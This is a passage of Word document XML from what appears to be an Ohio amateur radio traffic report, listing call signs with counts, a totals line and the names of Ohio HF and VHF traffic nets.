        <w:tab/>
        <w:t>KD8UUB-38</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>N8TNV-112</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43266C8F" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>AC8RV-40</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>KB8HJJ-45</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>KL7RF-89</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>NC8V-7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341F92B3" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>AD8CM-44</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>KC8IDM-63</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>KM8V-15</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>W8DJG-149</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4BB452" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>KA1G-20</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>KC8WH-55</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>KV8Z-10</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>W8GSR-57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055178B9" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>K3AUX-38</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>KD8GYI-90</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>N2LC-58</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>WA3EZN-142</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2190F6E6" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>K3RC-45</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>KD8HB-38</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>N8BV-42</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>WB8PMG-18</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515C970B" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>K8KRA-55</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>KD8KBX-45</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>N8GBU-43</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>WB8SIQ-52</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681B5164" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>K8MDA-32</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>KD8MSZ-19</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>N8MRS-83</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>WB8YYS-24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0E65B5" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>K8MWF-23</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>KD8UOT-6</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>N8SY-5</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>WB9LBI-78</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7260BEAC" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>KC8HTP-3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047FB84F" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32CE70DD" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>TOTALS</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>37/1743</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CC90AC" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="14820"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26D6EDC7" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E6CB639" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>OHIO HF TRAFFIC NETS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9774C2" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C671E55" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>BN(E)</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>Buckeye Net Early - CW</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B034CE9" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">BN(L) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>Buckeye Net Late – CW</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AA8306" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>OSN</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>Ohio Slow Net - CW</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40716B1A" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>OSSBN</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>Ohio Single Sideband Net – Phone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2689E7" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13854B5F" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>OHIO VHF TRAFFIC NETS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA936ED" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25AD23E0" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>BRTN</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
